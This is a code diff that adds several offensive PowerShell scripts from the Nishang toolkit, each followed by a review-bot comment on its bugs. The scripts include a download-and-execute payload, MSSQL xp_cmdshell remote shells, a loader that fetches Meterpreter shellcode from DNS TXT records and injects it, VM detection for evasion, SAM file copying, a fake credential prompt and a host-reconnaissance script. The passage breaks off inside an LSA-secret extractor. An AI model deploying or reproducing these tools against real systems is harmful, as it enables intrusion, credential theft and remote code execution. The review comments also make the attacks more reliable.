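Review bot: `.PARAMETER Arguments` is misleading: the value is not passed as arguments to the downloaded script but run on its own through `Invoke-Expression $Arguments` after the script body has been evaluated, i.e. it is an arbitrary follow-up command; the help and the example (which uses `-Argument`, relying on prefix matching of the `$Arguments` parameter name) should say so. Both paths execute whatever the URL returns with no integrity check, and the `else` path writes `$env:temp\deps.ps1` and never removes it, so document that the file is left on disk. Minor: "dowloaded" and "dowload" in the help.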


@ -0,0 +1,36 @@
<#
.SYNOPSIS
Nishang Payload to download an executable in text format, convert it to executable and execute.
.DESCRIPTION
This payload downloads an executable in text format, converts it to executable and execute.
Use exetotext.ps1 script to change an executable to text
.PARAMETER URL
The URL from where the file would be downloaded.
.EXAMPLE
PS > Download_Execute http://example.com/file.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download_Execute
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL
)
$webclient = New-Object System.Net.WebClient
[string]$hexformat = $webClient.DownloadString($URL)
[Byte[]] $temp = $hexformat -split ' '
[System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
start-process -nonewwindow "$env:temp\svcmondr.exe"
}
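Review bot: The help says the executable is downloaded "in text format", but the code's only contract is `[Byte[]] $temp = $hexformat -split ' '`, a single space-separated list of byte values; document that format explicitly (or point at the output of `exetotext.ps1`) so the `[Byte[]]` cast failure on any other input is not a surprise. The output file name `$env:temp\svcmondr.exe` is hard-coded and never cleaned up, which the help should state, and `$webClient` is spelled with a different case from `$webclient` two lines above (works, but inconsistent). The `.LINK` entry uses `labofapenetrationtester.blogspot.com` whereas the other scripts in this commit link to `labofapenetrationtester.com`.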


@ -0,0 +1,120 @@
<#
.SYNOPSIS
Nishang payload which could be used to execute commands remotely on a MS SQL server.
.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
or a cmd shell on the target.
.PARAMETER ComputerName
Enter CopmuterName or IP Address of the target SQL server.
.PARAMETER UserName
Enter a UserName for a SQL server administrator account.
.PARAMETER Password
Enter the Password for the account.
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
.LINK
http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html
https://github.com/samratashok/nishang
.NOTES
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
http://www.truesec.com
#>
function Execute-Command-MSSQL {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
[string]
$ComputerName,
[parameter(Mandatory = $true, Position = 1)]
[string]
$UserName,
[parameter(Mandatory = $true, Position = 2)]
[string]
$Password
)
Try{
function Make-Connection ($query)
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
$Connection.Close()
}
"Connecting to $ComputerName..."
Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
"`nEnabling XP_CMDSHELL...`n"
Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
$shell = read-host
while($payload -ne "exit")
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
if ($shell -eq "P")
{
write-host "`n`nStarting PowerShell on the target..`n"
write-host -NoNewline "PS $ComputerName> "
$payload = read-host
$cmd = "EXEC xp_cmdshell 'powershell.exe -Command `"& {$payload}`"'"
}
elseif ($shell -eq "S")
{
write-host "`n`nStarting SQL shell on the target..`n"
write-host -NoNewline "MSSQL $ComputerName> "
$payload = read-host
$cmd = $payload
}
elseif ($shell -eq "C")
{
write-host "`n`nStarting cmd shell on the target..`n"
write-host -NoNewline "CMD $ComputerName> "
$payload = read-host
$cmd = "EXEC xp_cmdshell 'cmd.exe /K $payload'"
}
$Command.CommandText = "$cmd"
$Reader = $Command.ExecuteReader()
while ($reader.Read()) {
New-Object PSObject -Property @{
Name = $reader.GetValue(0)
}
}
$Connection.Close()
}
}
Catch {
$error[0]
}
}
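Review bot: `$shell` is read from the user but never validated, so an answer other than `P`, `S` or `C` leaves `$cmd` unset, `ExecuteReader()` throws on the empty `CommandText`, and the `Catch` just prints `$error[0]`, after both `sp_configure` changes have already been applied; validate `$shell` before anything is changed on the server. The two `sp_configure` calls are never reverted, so the help should state that the script leaves `xp_cmdshell` enabled. `Make-Connection` calls `ExecuteReader()` and then `Close()` without disposing `$Reader`, and the per-iteration `$Connection` has no `finally`, so a query error inside the `Try` block leaves it open. `$Password` is a plain `[string]` that ends up in the connection string in cleartext; a `[PSCredential]` parameter would keep it out of the command line and session history. Help text: "CopmuterName"; and the `Try{` spacing should match the rest of the file.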


@ -0,0 +1,90 @@
<#
.SYNOPSIS
Payload which could execute shellcode from DNS TXT queries.
.DESCRIPTION
This payload is able to pull shellcode from txt record of a domain. It has been tested for
first stage of meterpreter shellcode generated using msf.
Below commands could be used to generate shellcode to be usable with this payload
./msfpayload windows/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
.PARAMETER shellcode32
The domain (or subdomain) whose TXT records would hold 32-bit shellcode.
.PARAMETER shellcode64
The domain (or subdomain) whose TXT records would hold 64-bit shellcode.
.PARAMETER AUTHNS
Authoritative Name Server for the domains.
.EXAMPLE
PS > Execute-DNSTXT-Code
The payload will ask for all required options.
.EXAMPLE
PS > Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com
Use above from non-interactive shell.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
.NOTES
The code execution logic is based on this post by Matt.
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
#>
function Execute-DNSTXT-Code
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ShellCode32,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$ShellCode64,
[Parameter(Position = 2, Mandatory = $True)]
[String]
$AuthNS
)
$code = (Invoke-Expression "nslookup -querytype=txt $shellcode32 $AuthNS")
$tmp = $code | select-string -pattern "`""
$tmp1 = $tmp -split("`"")[0]
[string]$shell = $tmp1 -replace "`t", ""
$shell = $shell.replace(" ", "")
[Byte[]]$sc32 = $shell -split ','
$code64 = (Invoke-Expression "nslookup -querytype=txt $shellcode64 $AuthNS")
$tmp64 = $code64 | select-string -pattern "`""
$tmp164 = $tmp64 -split("`"")[0]
[string]$shell64 = $tmp164 -replace "`t", ""
$shell64 = $shell64.replace(" ", "")
[Byte[]]$sc64 = $shell64 -split ','
$code = @'
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
'@
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
[Byte[]]$sc = $sc32
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)
while(1)
{
start-sleep -Seconds 100
}
}
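Review bot: `$tmp1 = $tmp -split("`"")[0]` (and the matching `$tmp164` line) does not index the split result: the `[0]` binds to the pattern expression `("`"")` first, so the statement is just `$tmp -split '"'` and `$tmp1` holds every fragment of each matched line, leading tab included. It only works because the later `-replace "`t", ""` and `.replace(" ", "")` squash the fragments back together; drop the misleading `[0]` so the intent (collect all quoted fragments) is visible. `Invoke-Expression "nslookup -querytype=txt $shellcode32 $AuthNS"` is also unnecessary, since `nslookup -querytype=txt $ShellCode32 $AuthNS` runs the same command without re-parsing the three string parameters as PowerShell; and the help should state that the function never returns, because of the `while(1) { start-sleep -Seconds 100 }` loop at the end.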

View file

@ -0,0 +1,302 @@
<#
.SYNOPSIS
Nishang script which detects whether it is in a known virtual machine.
.DESCRIPTION
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
Xen and QEMU for detecting the environment.
.EXAMPLE
PS > Check-VM
.LINK
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
https://github.com/samratashok/nishang
.NOTES
The script draws heavily from checkvm.rb post module from msf.
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
#>
function Check-VM
{
[CmdletBinding()] Param()
$ErrorActionPreference = "SilentlyContinue"
#Hyper-V
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
{
$hypervm = $true
}
if (!$hypervm)
{
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
{
$hypervm = $true
}
}
if ($hypervm)
{
"This is a Hyper-V machine."
}
#VMWARE
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
{
$vmwarevm = $true
}
if (!$vmwarevm)
{
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Process
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
{
$vmwarevm = $true
}
}
if ($vmwarevm)
{
"This is a VMWare machine."
}
#Virtual PC
$vpc = Get-Process
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
{
$vpcvm = $true
}
if (!$vpcvm)
{
$vpc = Get-Process
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
{
$vpcvm = $true
}
}
if (!$vpcvm)
{
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
{
$vpcvm = $true
}
}
if ($vpcvm)
{
"This is a Virtual PC."
}
#Virtual Box
$vb = Get-Process
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
{
$vbvm = $true
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
{
$vbvm = $true
}
}
if ($vbvm)
{
"This is a Virtual Box."
}
#Xen
$xen = Get-Process
if ($xen -eq "xenservice.exe")
{
$xenvm = $true
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
{
$xenvm = $true
}
}
if ($xenvm)
{
"This is a Xen Machine."
}
#QEMU
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($qemu -match "qemu")
{
$qemuvm = $true
}
if (!$qemuvm)
{
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
if ($qemu -match "qemu")
{
$qemuvm = $true
}
}
if ($qemuvm)
{
"This is a Qemu machine."
}
}
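Review bot: the second Virtual PC check is a copy of the VMware one: `if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))` sets `$vpcvm`, so whatever that test detects would be reported as Virtual PC as well; it should test Virtual PC processes or be dropped. As written, all of the `Get-Process` comparisons are dead code anyway: `Get-Process` returns Process objects whose ProcessName carries no `.exe` suffix and whose string form is `System.Diagnostics.Process (name)`, so neither `-eq "vmusrvc.exe"` nor `-match "vmsrvc.exe"` can ever be true. Two smaller points: the result flags (`$hypervm`, `$vmwarevm`, `$vpcvm`, ...) are never initialised to `$false`, so a same-named variable in the caller's scope is picked up by the `if (!$hypervm)` tests; and `hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0` lacks the backslash after the drive that every other path has (it resolves only because the drive's current location is the root).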

View file

@ -0,0 +1,57 @@
<#
.SYNOPSIS
Nishang Payload which copies the SAM file.
.DESCRIPTION
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. This must be run from an elevated shell.
.PARAMETER PATH
The path where SAM file would be saved. The folder must exist already.
.EXAMPLE
PS > Copy-VSS
Saves the SAM file in current run location of the payload.
.Example
PS > Copy-VSS -path C:\temp
.LINK
http://www.canhazcode.com/index.php?a=4
https://github.com/samratashok/nishang
.NOTES
Code by @al14s
#>
function Copy-VSS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Path
)
$service = (Get-Service -name VSS)
if($service.Status -ne "Running")
{
$notrunning=1
$service.Start()
}
$id = (gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume = (gwmi win32_shadowcopy -filter "ID='$id'")
$filepath = "$pwd\SAM"
if ($path)
{
$filepath = "$path\SAM"
}
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath`
$volume.Delete()
if($notrunning -eq 1)
{
$service.Stop()
}
}
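Review bot: the backticks around `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath` are not shell quoting in PowerShell: the backtick is the escape character, and a backtick at the end of a line is a line continuation, so the following `$volume.Delete()` becomes part of the cmd command line instead of a separate statement. It is then either evaluated as an argument before cmd runs (deleting the shadow before the copy) or passed through as text, so copy and cleanup do not happen in the intended order. Remove both backticks. The cleanup should also live in a `finally` block so the shadow copy is deleted and the VSS service stopped even when the copy fails, and `.PARAMETER PATH` is better written `.PARAMETER Path` to match the declared `$Path`.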

View file

@ -0,0 +1,49 @@
<#
.SYNOPSIS
Nishang Payload which opens a user credential prompt.
.DESCRIPTION
This payload opens a prompt which asks for user credentials and
does not go away till valid credentials are entered in the prompt.
The credentials can then exfiltrated using method of choice.
.EXAMPLE
PS > Credentials
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Credentials
{
[CmdletBinding()]
Param ()
$ErrorActionPreference="SilentlyContinue"
Add-Type -assemblyname system.DirectoryServices.accountmanagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
while($true)
{
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
if($credential)
{
$creds = $credential.GetNetworkCredential()
[String]$user = $creds.username
[String]$pass = $creds.password
[String]$domain = $creds.domain
$authlocal = $DS.ValidateCredentials($user, $pass)
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
{
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
$output
break
}
}
}
}
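Review bot: the result line `$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name` labels two different values as `Domain:`; the first is the domain entered in the prompt and the second is the name of the bound DirectoryEntry, so the output cannot be read unambiguously. Give them distinct labels. Also, on a machine that is not domain-joined `([ADSI]"").distinguishedName` is empty and `$domainDN` is just `LDAP://`, which `$ErrorActionPreference="SilentlyContinue"` hides; only the local `ValidateCredentials` path is meaningful there, and the help should say so.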

View file

@ -0,0 +1,67 @@
<#
.SYNOPSIS
This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.
.DESCRIPTION
FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be VERY slow).
.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020
.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020 -Verbose
Use above for increased verbosity.
.LINK
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
https://github.com/samratashok/nishang
http://roo7break.co.uk
.NOTES
Major part of the script is written by Nikhil ShreeKumar (@roo7break)
#>
function FireBuster{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$targetip = $(throw "Please specify an EndPoint (Host or IP Address)"),
[Parameter(Position = 1, Mandatory = $False)]
[String] $portrange = "1-65535"
)
$ErrorActionPreference = 'SilentlyContinue'
[int] $lowport = $portrange.split("-")[0]
[int] $highport = $portrange.split("-")[1]
$hostaddr = [system.net.IPAddress]::Parse($targetip)
Write-Verbose "Trying to connect to $hostaddr from $lowport to $highport"
[int] $ports = 0
Write-Host "Sending...."
for($ports=$lowport; $ports -le $highport ; $ports++){
try{
Write-Verbose "Trying port $ports"
$client = New-Object System.Net.Sockets.TcpClient
$beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)
$TimeOut = 300
if($client.Connected)
{
Write-Host "Connected to port $ports" -ForegroundColor Green
}
else
{
Start-Sleep -Milli $TimeOut
if($client.Connected)
{
Write-Host "Connected to port $ports" -ForegroundColor Green
}
}
$client.Close()
}catch { Write-Error $Error[0]}
}
Write-Host "Data sent to all ports"
}
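Review bot: the connect result is never waited for: `$beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)` starts an asynchronous connect, but the code reads `$client.Connected` immediately and again after a fixed `Start-Sleep -Milli $TimeOut`, without calling `EndConnect` or waiting on the returned IAsyncResult, so the 300 ms figure is a guess and slower paths are reported as blocked. Use `$beginConnect.AsyncWaitHandle.WaitOne($TimeOut)` and then check `$client.Connected`. Two smaller points: `$targetip = $(throw "...")` is redundant with `Mandatory = $True`, and a single-port `-portrange` such as `80` makes `$portrange.split("-")[1]` null, so `$highport` becomes 0 and the loop never runs; validate the range format.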

View file

@ -0,0 +1,95 @@
<#
.SYNOPSIS
This script is part of Nishang. FireListener is a PowerShell script that does egress testing. It is to be run on the attacking/listening machine.
.DESCRIPTION
FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machine which is to
be tested for egress filtering.
.EXAMPLE
PS > FireListener -portrange 1000-1020
.LINK
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
https://github.com/samratashok/nishang
http://roo7break.co.uk
.NOTES
Based on the script written by Nikhil ShreeKumar (@roo7break)
#>
function FireListener
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$PortRange
)
$ErrorActionPreference = 'SilentlyContinue'
#Code which opens a socket for each port
$socketblock = {
param($port = $args[1])
try
{
$EndPoint = New-Object System.Net.IPEndPoint([ipaddress]::any, $port)
$ListenSocket = New-Object System.Net.Sockets.TCPListener $EndPoint
$ListenSocket.Start()
$RecData = $ListenSocket.AcceptTCPClient()
$clientip = $RecData.Client.RemoteEndPoint.Address.ToString()
$clientport = $RecData.Client.LocalEndPoint.Port.ToString()
Write-Host "$clientip connected through port $clientport" -ForegroundColor Green
$Stream.Close()
$ListenSocket.Stop()
} catch
{ Write-Error $Error[0] }
}
[int] $lowport = $portrange.split("-")[0]
[int] $highport = $portrange.split("-")[1]
[int] $ports = 0
Get-Job | Remove-Job
#Start a job for each port
for($ports=$lowport; $ports -le $highport; $ports++)
{
"Listening on port $ports"
$job = start-job -ScriptBlock $socketblock -ArgumentList $ports -Name $ports
}
[console]::TreatControlCAsInput = $true
while ($true)
{
# code from http://poshcode.org/542 to capture Ctrl+C
# start code snip
if ($Host.UI.RawUI.KeyAvailable -and (3 -eq [int]$Host.UI.RawUI.ReadKey("AllowCtrlC,IncludeKeyUp,NoEcho").Character))
{
Write-Host "Stopping all jobs.....This can take many minutes." -Background DarkRed
Sleep 2
Get-Job | Stop-Job
Get-Job | Remove-Job
#Stop-Process -Id $PID
break;
}
# end code snip
#Start a new job which listens on the same port for every completed job.
foreach ($job1 in (Get-Job))
{
Start-Sleep -Seconds 4
Get-Job | Receive-Job
if ($job1.State -eq "Completed")
{
$port = $job1.Name
"Listening on port $port"
$newjobs = start-job -ScriptBlock $socketblock -ArgumentList $port -Name $port
Get-Job | Remove-Job
}
}
}
}
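Review bot: `$Stream.Close()` in `$socketblock` refers to a variable that is never defined; the accepted client `$RecData` is what should be closed, and the resulting error is hidden by `$ErrorActionPreference = 'SilentlyContinue'`. `Get-Job | Remove-Job` (before the loop and again inside the `foreach`) also removes every background job in the caller's session, not just the listeners; filter on the port names this function assigns with `-Name $ports`. Finally, `[console]::TreatControlCAsInput = $true` is never restored after `break;`, which leaves the console ignoring Ctrl+C after the function returns.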

View file

@ -0,0 +1,62 @@
<#
.SYNOPSIS
Nishang Payload which gathers juicy information from the target.
.DESCRIPTION
This payload extracts information form registry and some commands.
The information available would be dependent on the privilege with
which the script would be executed.
.EXAMPLE
PS > Get-Information
Use above to execute the function.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Get-Information
{
[CmdletBinding()]
Param ()
function registry_values($regkey, $regvalue,$child)
{
if ($child -eq "no"){$key = get-item $regkey}
else{$key = get-childitem $regkey}
$key |
ForEach-Object {
$values = Get-ItemProperty $_.PSPath
ForEach ($value in $_.Property)
{
if ($regvalue -eq "all") {$values.$value}
elseif ($regvalue -eq "allname"){$value}
else {$values.$regvalue;break}
}}}
$output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
$output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
$output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
$output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
$output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
$output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
$output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
$output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
$output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
$output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")
$output
}
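Review bot: `registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities"` points at a path that does not exist under HKCU (the CurrentControlSet hive lives under HKLM only), so the 'SNMP community strings for current user' section always produces an error and no data. More generally, `registry_values` has no error handling and the function sets no ErrorAction, so every absent key (the PuTTY keys on a host without PuTTY, the SNMP key without the service) prints a `get-item`/`get-childitem` error in the middle of the report; pass `-ErrorAction SilentlyContinue` or test the path first. Minor: 'extracts information form registry' in `.DESCRIPTION` should read 'from', and the 'Contents of /etc/hosts' label reads the Windows hosts file.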

View file

@ -0,0 +1,263 @@
<#
.SYNOPSIS
Nishang payload which extracts LSA Secrets from local computer.
.DESCRIPTION
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode and requires
permissions to the security key in HKLM. The permission could be obtained by using
Enable-DuplicateToken payload.
.PARAMETER RegistryKey
Name of Key to Extract. if the parameter is not used, all secrets will be displayed.
.EXAMPLE
PS > Get-LsaSecret
.EXAMPLE
PS > Get-LsaSecret -Key KeyName
Read contents of the key mentioned as parameter.
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Get-LsaSecret {
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory=$False)]
[String]
$RegistryKey
)
Begin {
# Check if User is Elevated
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
# Check if Script is run in a 32-bit Environment by checking a Pointer Size
if([System.IntPtr]::Size -eq 8) {
Write-Warning "Run PowerShell in 32-bit mode"
Break
}
# Check if RegKey is specified
if([string]::IsNullOrEmpty($registryKey)) {
[string[]]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
}
# Create Temporary Registry Key
if( -not(Test-Path "HKLM:\\SECURITY\Policy\Secrets\MySecret")) {
mkdir "HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
}
$signature = @"
[StructLayout(LayoutKind.Sequential)]
public struct LSA_UNICODE_STRING
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_OBJECT_ATTRIBUTES
{
public int Length;
public IntPtr RootDirectory;
